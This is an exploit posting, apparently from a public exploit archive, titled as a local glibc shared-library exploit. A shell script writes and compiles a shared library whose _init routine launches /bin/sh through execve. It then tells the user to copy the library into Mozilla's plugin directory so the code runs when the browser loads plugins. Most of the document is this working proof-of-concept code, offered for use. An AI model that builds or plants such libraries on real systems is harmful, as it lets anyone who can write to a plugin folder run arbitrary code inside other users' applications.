45 lines
No EOL
1.5 KiB
Text
45 lines
No EOL
1.5 KiB
Text
# Exploit Title: Local Glibc shared library (.so) exploit
|
|
# Date: 07.04.10
|
|
# Author: Rh0 (Rh0@z1p.biz)
|
|
# Software Link: NA
|
|
# Version: <= 2.11.1, higher not tested
|
|
# Tested on: Debian stable (x86-64), Ubunutu 9.10 (x86), Fedora 12 (x86)
|
|
# CVE : NA
|
|
# Code :
|
|
|
|
#!/bin/sh
|
|
|
|
# A lot of applications in linux use shared library structure to be
|
|
# able to load plugins. E.g. Mozilla, Geany IDE, Compiz, Epiphany web
|
|
# browser and more. Shared libraries are initialized (but not loaded)
|
|
# often during startup, at a click at something like "->Tools->Plugins"
|
|
# in the menue or at latest when they are activated. dlopen() is used
|
|
# for initializing and is part of glibc.
|
|
# See http://linux.die.net/man/3/dlopen.
|
|
# It always executes the _init section of the shared library. A
|
|
# malformed _init section makes dlopen crash (NULL dereference). But
|
|
# this is not even necessary to exploit an application, as a custom
|
|
# _init section is always executed when dlopen is called . The exploit
|
|
# can be in the form of a custom compiled file. Also the _init section in
|
|
# a plugin already shipped with the application can be overwritten with
|
|
# working shellcode to exploit it or some \x41 to crash it .
|
|
|
|
# PoC:
|
|
|
|
cat >Xlibx.c<<EOF
|
|
|
|
#include <unistd.h>
|
|
_init()
|
|
{
|
|
execve("/bin/sh",NULL,NULL); // evil _init
|
|
}
|
|
EOF
|
|
|
|
gcc -fPIC -c Xlibx.c
|
|
ld -shared -soname Xlibx -o Xlibx.so -lc Xlibx.o
|
|
rm Xlibx.c
|
|
rm Xlibx.o
|
|
|
|
echo "* copy Xlibx.so to appropriate directory:"
|
|
echo "* Mozilla: HOMEDIR/.mozilla/plugins/ "
|
|
echo "* firefox->Edit->Preferences => Exploit " |